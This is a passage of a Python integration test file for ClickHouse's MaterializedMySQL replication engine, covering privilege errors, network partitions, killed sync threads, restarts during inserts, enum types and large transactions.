check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n")
mysql_node.query("SET GLOBAL binlog_checksum=CRC32")
mysql_node.query("INSERT INTO test_checksum.t VALUES(3, '3333')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n3\t3333\n")
clickhouse_node.query("DROP DATABASE test_checksum")
mysql_node.query("DROP DATABASE test_checksum")
def err_sync_user_privs_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS priv_err_db")
mysql_node.query("DROP DATABASE IF EXISTS priv_err_db")
mysql_node.query("CREATE DATABASE priv_err_db DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE priv_err_db.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(1);")
mysql_node.create_min_priv_user("test", "123")
mysql_node.result("SHOW GRANTS FOR 'test'@'%';")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "1\n", 30, 5)
mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(2);")
check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "2\n")
clickhouse_node.query("DROP DATABASE priv_err_db;")
mysql_node.query("REVOKE REPLICATION SLAVE ON *.* FROM 'test'@'%'")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
clickhouse_node.query("DROP DATABASE priv_err_db")
mysql_node.query("REVOKE REPLICATION CLIENT, RELOAD ON *.* FROM 'test'@'%'")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
clickhouse_node.query("DETACH DATABASE priv_err_db")
mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
time.sleep(3)
with pytest.raises(QueryRuntimeException) as exception:
clickhouse_node.query("ATTACH DATABASE priv_err_db")
assert 'MySQL SYNC USER ACCESS ERR:' in str(exception.value)
assert "priv_err_db" not in clickhouse_node.query("SHOW DATABASES")
mysql_node.query("GRANT SELECT ON priv_err_db.* TO 'test'@'%'")
time.sleep(3)
clickhouse_node.query("ATTACH DATABASE priv_err_db")
clickhouse_node.query("DROP DATABASE priv_err_db")
mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
mysql_node.query("DROP DATABASE priv_err_db;")
mysql_node.query("DROP USER 'test'@'%'")
def restore_instance_mysql_connections(clickhouse_node, pm, action='REJECT'):
pm._check_instance(clickhouse_node)
pm._delete_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
pm._delete_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
time.sleep(5)
def drop_instance_mysql_connections(clickhouse_node, pm, action='REJECT'):
pm._check_instance(clickhouse_node)
pm._add_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
pm._add_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
time.sleep(5)
def network_partition_test(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_network")
clickhouse_node.query("DROP DATABASE IF EXISTS test")
mysql_node.query("DROP DATABASE IF EXISTS test_database_network")
mysql_node.query("DROP DATABASE IF EXISTS test")
mysql_node.query("CREATE DATABASE test_database_network;")
mysql_node.query("CREATE TABLE test_database_network.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("CREATE DATABASE test;")
clickhouse_node.query(
"CREATE DATABASE test_database_network ENGINE = MaterializedMySQL('{}:3306', 'test_database_network', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table", '')
with PartitionManager() as pm:
drop_instance_mysql_connections(clickhouse_node, pm)
mysql_node.query('INSERT INTO test_database_network.test_table VALUES(1)')
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table", '')
with pytest.raises(QueryRuntimeException) as exception:
clickhouse_node.query(
"CREATE DATABASE test ENGINE = MaterializedMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
assert "Can't connect to MySQL server" in str(exception.value)
restore_instance_mysql_connections(clickhouse_node, pm)
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table FORMAT TSV", '1\n')
clickhouse_node.query(
"CREATE DATABASE test ENGINE = MaterializedMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM test_database_network FORMAT TSV", "test_table\n")
mysql_node.query("CREATE TABLE test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test FORMAT TSV", "test\n")
clickhouse_node.query("DROP DATABASE test_database_network")
clickhouse_node.query("DROP DATABASE test")
mysql_node.query("DROP DATABASE test_database_network")
mysql_node.query("DROP DATABASE test")
def mysql_kill_sync_thread_restore_test(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS test_database;")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_auto;")
mysql_node.query("DROP DATABASE IF EXISTS test_database;")
mysql_node.query("CREATE DATABASE test_database;")
mysql_node.query("CREATE TABLE test_database.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO test_database.test_table VALUES (1)")
mysql_node.query("DROP DATABASE IF EXISTS test_database_auto;")
mysql_node.query("CREATE DATABASE test_database_auto;")
mysql_node.query("CREATE TABLE test_database_auto.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (11)")
clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse') SETTINGS max_wait_time_when_mysql_unavailable=-1".format(service_name))
clickhouse_node.query("CREATE DATABASE test_database_auto ENGINE = MaterializedMySQL('{}:3306', 'test_database_auto', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT * FROM test_database.test_table FORMAT TSV", '1\n')
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table FORMAT TSV", '11\n')
# When ClickHouse dump all history data we can query it on ClickHouse
# but it don't mean that the sync thread is already to connect to MySQL.
# So After ClickHouse can query data, insert some rows to MySQL. Use this to re-check sync successed.
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (22)")
mysql_node.query("INSERT INTO test_database.test_table VALUES (2)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table ORDER BY id FORMAT TSV", '11\n22\n')
get_sync_id_query = "SELECT id FROM information_schema.processlist WHERE state LIKE '% has sent all binlog to % waiting for more updates%';"
result = mysql_node.query_and_get_data(get_sync_id_query)
assert len(result) > 0
for row in result:
query = "kill " + str(row[0]) + ";"
mysql_node.query(query)
with pytest.raises(QueryRuntimeException, match="Cannot read all data"):
# https://dev.mysql.com/doc/refman/5.7/en/kill.html
# When you use KILL, a thread-specific kill flag is set for the thread.
# In most cases, it might take some time for the thread to die because the kill flag is checked only at specific intervals.
for sleep_time in [1, 3, 5]:
time.sleep(sleep_time)
clickhouse_node.query("SELECT * FROM test_database.test_table")
clickhouse_node.query("DETACH DATABASE test_database")
clickhouse_node.query("ATTACH DATABASE test_database")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
mysql_node.query("INSERT INTO test_database.test_table VALUES (3)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n3\n')
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (33)")
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table ORDER BY id FORMAT TSV", '11\n22\n33\n')
clickhouse_node.query("DROP DATABASE test_database")
clickhouse_node.query("DROP DATABASE test_database_auto")
mysql_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database_auto")
def mysql_killed_while_insert(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS kill_mysql_while_insert")
clickhouse_node.query("DROP DATABASE IF EXISTS kill_mysql_while_insert")
mysql_node.query("CREATE DATABASE kill_mysql_while_insert")
mysql_node.query("CREATE TABLE kill_mysql_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
clickhouse_node.query("CREATE DATABASE kill_mysql_while_insert ENGINE = MaterializedMySQL('{}:3306', 'kill_mysql_while_insert', 'root', 'clickhouse') SETTINGS max_wait_time_when_mysql_unavailable=-1".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM kill_mysql_while_insert FORMAT TSV", 'test\n')
try:
def insert(num):
for i in range(num):
query = "INSERT INTO kill_mysql_while_insert.test VALUES({v});".format( v = i + 1 )
mysql_node.query(query)
t = threading.Thread(target=insert, args=(10000,))
t.start()
clickhouse_node.cluster.restart_service(service_name)
finally:
with pytest.raises(QueryRuntimeException) as exception:
time.sleep(2)
clickhouse_node.query("SELECT count() FROM kill_mysql_while_insert.test")
mysql_node.alloc_connection()
clickhouse_node.query("DETACH DATABASE kill_mysql_while_insert")
clickhouse_node.query("ATTACH DATABASE kill_mysql_while_insert")
result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_mysql_while_insert.test")
for row in result:
res = str(row[0]) + '\n'
check_query(clickhouse_node, "SELECT count() FROM kill_mysql_while_insert.test", res)
mysql_node.query("DROP DATABASE kill_mysql_while_insert")
clickhouse_node.query("DROP DATABASE kill_mysql_while_insert")
def clickhouse_killed_while_insert(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS kill_clickhouse_while_insert")
mysql_node.query("CREATE DATABASE kill_clickhouse_while_insert")
mysql_node.query("CREATE TABLE kill_clickhouse_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
clickhouse_node.query("CREATE DATABASE kill_clickhouse_while_insert ENGINE = MaterializedMySQL('{}:3306', 'kill_clickhouse_while_insert', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM kill_clickhouse_while_insert FORMAT TSV", 'test\n')
def insert(num):
for i in range(num):
query = "INSERT INTO kill_clickhouse_while_insert.test VALUES({v});".format( v = i + 1 )
mysql_node.query(query)
t = threading.Thread(target=insert, args=(1000,))
t.start()
# TODO: add clickhouse_node.restart_clickhouse(20, kill=False) test
clickhouse_node.restart_clickhouse(20, kill=True)
t.join()
result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_clickhouse_while_insert.test")
for row in result:
res = str(row[0]) + '\n'
check_query(clickhouse_node, "SELECT count() FROM kill_clickhouse_while_insert.test FORMAT TSV", res)
mysql_node.query("DROP DATABASE kill_clickhouse_while_insert")
clickhouse_node.query("DROP DATABASE kill_clickhouse_while_insert")
def utf8mb4_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
clickhouse_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
mysql_node.query("CREATE DATABASE utf8mb4_test")
mysql_node.query("CREATE TABLE utf8mb4_test.test (id INT(11) NOT NULL PRIMARY KEY, name VARCHAR(255)) ENGINE=InnoDB DEFAULT CHARACTER SET utf8mb4")
mysql_node.query("INSERT INTO utf8mb4_test.test VALUES(1, '🦄'),(2, '\u2601')")
clickhouse_node.query("CREATE DATABASE utf8mb4_test ENGINE = MaterializedMySQL('{}:3306', 'utf8mb4_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM utf8mb4_test FORMAT TSV", "test\n")
check_query(clickhouse_node, "SELECT id, name FROM utf8mb4_test.test ORDER BY id", "1\t\U0001F984\n2\t\u2601\n")
def system_parts_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS system_parts_test")
clickhouse_node.query("DROP DATABASE IF EXISTS system_parts_test")
mysql_node.query("CREATE DATABASE system_parts_test")
mysql_node.query("CREATE TABLE system_parts_test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO system_parts_test.test VALUES(1),(2),(3)")
def check_active_parts(num):
check_query(clickhouse_node, "SELECT count() FROM system.parts WHERE database = 'system_parts_test' AND table = 'test' AND active = 1", "{}\n".format(num))
clickhouse_node.query("CREATE DATABASE system_parts_test ENGINE = MaterializedMySQL('{}:3306', 'system_parts_test', 'root', 'clickhouse')".format(service_name))
check_active_parts(1)
mysql_node.query("INSERT INTO system_parts_test.test VALUES(4),(5),(6)")
check_active_parts(2)
clickhouse_node.query("OPTIMIZE TABLE system_parts_test.test")
check_active_parts(1)
def multi_table_update_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS multi_table_update")
clickhouse_node.query("DROP DATABASE IF EXISTS multi_table_update")
mysql_node.query("CREATE DATABASE multi_table_update")
mysql_node.query("CREATE TABLE multi_table_update.a (id INT(11) NOT NULL PRIMARY KEY, value VARCHAR(255))")
mysql_node.query("CREATE TABLE multi_table_update.b (id INT(11) NOT NULL PRIMARY KEY, othervalue VARCHAR(255))")
mysql_node.query("INSERT INTO multi_table_update.a VALUES(1, 'foo')")
mysql_node.query("INSERT INTO multi_table_update.b VALUES(1, 'bar')")
clickhouse_node.query("CREATE DATABASE multi_table_update ENGINE = MaterializedMySQL('{}:3306', 'multi_table_update', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM multi_table_update", "a\nb\n")
mysql_node.query("UPDATE multi_table_update.a, multi_table_update.b SET value='baz', othervalue='quux' where a.id=b.id")
check_query(clickhouse_node, "SELECT * FROM multi_table_update.a", "1\tbaz\n")
check_query(clickhouse_node, "SELECT * FROM multi_table_update.b", "1\tquux\n")
def system_tables_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS system_tables_test")
clickhouse_node.query("DROP DATABASE IF EXISTS system_tables_test")
mysql_node.query("CREATE DATABASE system_tables_test")
mysql_node.query("CREATE TABLE system_tables_test.test (id int NOT NULL PRIMARY KEY) ENGINE=InnoDB")
clickhouse_node.query("CREATE DATABASE system_tables_test ENGINE = MaterializedMySQL('{}:3306', 'system_tables_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT partition_key, sorting_key, primary_key FROM system.tables WHERE database = 'system_tables_test' AND name = 'test'", "intDiv(id, 4294967)\tid\tid\n")
def materialize_with_column_comments_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_column_comments_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_column_comments_test")
mysql_node.query("CREATE DATABASE materialize_with_column_comments_test")
mysql_node.query("CREATE TABLE materialize_with_column_comments_test.test (id int NOT NULL PRIMARY KEY, value VARCHAR(255) COMMENT 'test comment') ENGINE=InnoDB")
clickhouse_node.query("CREATE DATABASE materialize_with_column_comments_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_column_comments_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\ttest comment\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE materialize_with_column_comments_test.test MODIFY value VARCHAR(255) COMMENT 'comment test'")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\tcomment test\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE materialize_with_column_comments_test.test ADD value2 int COMMENT 'test comment 2'")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\tcomment test\t\t\nvalue2\tNullable(Int32)\t\t\ttest comment 2\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_column_comments_test")
mysql_node.query("DROP DATABASE materialize_with_column_comments_test")
def materialize_with_enum8_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_enum8_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_enum8_test")
mysql_node.query("CREATE DATABASE materialize_with_enum8_test")
enum8_values_count = 127
enum8_values = ""
enum8_values_with_backslash = ""
for i in range(1, enum8_values_count):
enum8_values += '\'' + str(i) + "\', "
enum8_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum8_values += '\'' + str(enum8_values_count) + '\''
enum8_values_with_backslash += "\\\'" + str(enum8_values_count) +"\\\' = " + str(enum8_values_count)
mysql_node.query("CREATE TABLE materialize_with_enum8_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum8_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO materialize_with_enum8_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE materialize_with_enum8_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_enum8_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum8_test.test ORDER BY id", "1\n2\n")
mysql_node.query("INSERT INTO materialize_with_enum8_test.test (id, value) VALUES (3, '127')")
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum8_test.test ORDER BY id", "1\n2\n127\n")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_enum8_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum8(" + enum8_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_enum8_test")
mysql_node.query("DROP DATABASE materialize_with_enum8_test")
def materialize_with_enum16_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_enum16_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_enum16_test")
mysql_node.query("CREATE DATABASE materialize_with_enum16_test")
enum16_values_count = 600
enum16_values = ""
enum16_values_with_backslash = ""
for i in range(1, enum16_values_count):
enum16_values += '\'' + str(i) + "\', "
enum16_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum16_values += '\'' + str(enum16_values_count) + '\''
enum16_values_with_backslash += "\\\'" + str(enum16_values_count) +"\\\' = " + str(enum16_values_count)
mysql_node.query("CREATE TABLE materialize_with_enum16_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum16_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO materialize_with_enum16_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE materialize_with_enum16_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_enum16_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum16_test.test ORDER BY id", "1\n2\n")
mysql_node.query("INSERT INTO materialize_with_enum16_test.test (id, value) VALUES (3, '500')")
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum16_test.test ORDER BY id", "1\n2\n500\n")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum16(" + enum16_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_enum16_test")
mysql_node.query("DROP DATABASE materialize_with_enum16_test")
def alter_enum8_to_enum16_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS alter_enum8_to_enum16_test")
clickhouse_node.query("DROP DATABASE IF EXISTS alter_enum8_to_enum16_test")
mysql_node.query("CREATE DATABASE alter_enum8_to_enum16_test")
enum8_values_count = 100
enum8_values = ""
enum8_values_with_backslash = ""
for i in range(1, enum8_values_count):
enum8_values += '\'' + str(i) + "\', "
enum8_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum8_values += '\'' + str(enum8_values_count) + '\''
enum8_values_with_backslash += "\\\'" + str(enum8_values_count) +"\\\' = " + str(enum8_values_count)
mysql_node.query("CREATE TABLE alter_enum8_to_enum16_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum8_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE alter_enum8_to_enum16_test ENGINE = MaterializedMySQL('{}:3306', 'alter_enum8_to_enum16_test', 'root', 'clickhouse')".format(service_name))
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (3, '75')")
check_query(clickhouse_node, "SELECT value FROM alter_enum8_to_enum16_test.test ORDER BY id", "1\n2\n75\n")
check_query(clickhouse_node, "DESCRIBE TABLE alter_enum8_to_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum8(" + enum8_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
enum16_values_count = 600
enum16_values = ""
enum16_values_with_backslash = ""
for i in range(1, enum16_values_count):
enum16_values += '\'' + str(i) + "\', "
enum16_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum16_values += '\'' + str(enum16_values_count) + '\''
enum16_values_with_backslash += "\\\'" + str(enum16_values_count) +"\\\' = " + str(enum16_values_count)
mysql_node.query("ALTER TABLE alter_enum8_to_enum16_test.test MODIFY COLUMN value ENUM(" + enum16_values + ")")
check_query(clickhouse_node, "DESCRIBE TABLE alter_enum8_to_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum16(" + enum16_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (4, '500')")
check_query(clickhouse_node, "SELECT value FROM alter_enum8_to_enum16_test.test ORDER BY id", "1\n2\n75\n500\n")
clickhouse_node.query("DROP DATABASE alter_enum8_to_enum16_test")
mysql_node.query("DROP DATABASE alter_enum8_to_enum16_test")
def move_to_prewhere_and_column_filtering(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS cond_on_key_col")
mysql_node.query("DROP DATABASE IF EXISTS cond_on_key_col")
mysql_node.query("CREATE DATABASE cond_on_key_col")
clickhouse_node.query("CREATE DATABASE cond_on_key_col ENGINE = MaterializedMySQL('{}:3306', 'cond_on_key_col', 'root', 'clickhouse')".format(service_name))
mysql_node.query("create table cond_on_key_col.products (id int primary key, product_id int not null, catalog_id int not null, brand_id int not null, name text)")
mysql_node.query("insert into cond_on_key_col.products (id, name, catalog_id, brand_id, product_id) values (915, 'ertyui', 5287, 15837, 0), (990, 'wer', 1053, 24390, 1), (781, 'qwerty', 1041, 1176, 2);")
mysql_node.query("create table cond_on_key_col.test (id int(11) NOT NULL AUTO_INCREMENT, a int(11) DEFAULT NULL, b int(11) DEFAULT NULL, PRIMARY KEY (id)) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4;")
mysql_node.query("insert into cond_on_key_col.test values (42, 123, 1);")
mysql_node.query("CREATE TABLE cond_on_key_col.balance_change_record (id bigint(20) NOT NULL AUTO_INCREMENT, type tinyint(4) DEFAULT NULL, value decimal(10,4) DEFAULT NULL, time timestamp NULL DEFAULT NULL, "
"initiative_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, passivity_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, "
"person_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, tenant_code varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, "
"created_time timestamp NULL DEFAULT CURRENT_TIMESTAMP COMMENT '创建时间', updated_time timestamp NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, "
"value_snapshot decimal(10,4) DEFAULT NULL, PRIMARY KEY (id), KEY balance_change_record_initiative_id (person_id) USING BTREE, "
"KEY type (type) USING BTREE, KEY balance_change_record_type (time) USING BTREE, KEY initiative_id (initiative_id) USING BTREE, "
"KEY balance_change_record_tenant_code (passivity_id) USING BTREE, KEY tenant_code (tenant_code) USING BTREE) ENGINE=InnoDB AUTO_INCREMENT=1691049 DEFAULT CHARSET=utf8")
mysql_node.query("insert into cond_on_key_col.balance_change_record values (123, 1, 3.14, null, 'qwe', 'asd', 'zxc', 'rty', null, null, 2.7);")
mysql_node.query("CREATE TABLE cond_on_key_col.test1 (id int(11) NOT NULL AUTO_INCREMENT, c1 varchar(32) NOT NULL, c2 varchar(32), PRIMARY KEY (id)) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4")
mysql_node.query("insert into cond_on_key_col.test1(c1,c2) values ('a','b'), ('c', null);")
check_query(clickhouse_node, "SELECT DISTINCT P.id, P.name, P.catalog_id FROM cond_on_key_col.products P WHERE P.name ILIKE '%e%' and P.catalog_id=5287", '915\tertyui\t5287\n')
check_query(clickhouse_node, "select count(a) from cond_on_key_col.test where b = 1;", "1\n")
check_query(clickhouse_node, "select id from cond_on_key_col.balance_change_record where type=1;", "123\n")
check_query(clickhouse_node, "select count(c1) from cond_on_key_col.test1 where c2='b';", "1\n")
clickhouse_node.query("DROP DATABASE cond_on_key_col")
mysql_node.query("DROP DATABASE cond_on_key_col")
def mysql_settings_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database")
mysql_node.query("CREATE TABLE test_database.a (id INT(11) NOT NULL PRIMARY KEY, value VARCHAR(255))")
mysql_node.query("INSERT INTO test_database.a VALUES(1, 'foo')")
mysql_node.query("INSERT INTO test_database.a VALUES(2, 'bar')")
clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT() FROM test_database.a FORMAT TSV", "2\n")
assert clickhouse_node.query("SELECT COUNT(DISTINCT blockNumber()) FROM test_database.a FORMAT TSV") == "2\n"
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def materialized_mysql_large_transaction(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS largetransaction")
clickhouse_node.query("DROP DATABASE IF EXISTS largetransaction")
mysql_node.query("CREATE DATABASE largetransaction")
mysql_node.query("CREATE TABLE largetransaction.test_table ("
"`key` INT NOT NULL PRIMARY KEY AUTO_INCREMENT, "
"`value` INT NOT NULL) ENGINE = InnoDB;")
num_rows = 200000
rows_per_insert = 5000
values = ",".join(["(1)" for _ in range(rows_per_insert)])
for i in range(num_rows//rows_per_insert):
mysql_node.query(f"INSERT INTO largetransaction.test_table (`value`) VALUES {values};")
clickhouse_node.query("CREATE DATABASE largetransaction ENGINE = MaterializedMySQL('{}:3306', 'largetransaction', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT() FROM largetransaction.test_table", f"{num_rows}\n")
mysql_node.query("UPDATE largetransaction.test_table SET value = 2;")
# Attempt to restart clickhouse after it has started processing
# the transaction, but before it has completed it.
while int(clickhouse_node.query("SELECT COUNT() FROM largetransaction.test_table WHERE value = 2")) == 0:
time.sleep(0.2)
clickhouse_node.restart_clickhouse()
check_query(clickhouse_node, "SELECT COUNT() FROM largetransaction.test_table WHERE value = 2", f"{num_rows}\n")
clickhouse_node.query("DROP DATABASE largetransaction")
mysql_node.query("DROP DATABASE largetransaction")
def table_table(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS table_test")
clickhouse_node.query("DROP DATABASE IF EXISTS table_test")
mysql_node.query("CREATE DATABASE table_test")
# Test that the table name 'table' work as expected
mysql_node.query("CREATE TABLE table_test.table (id INT UNSIGNED PRIMARY KEY)")
mysql_node.query("INSERT INTO table_test.table VALUES (0),(1),(2),(3),(4)")
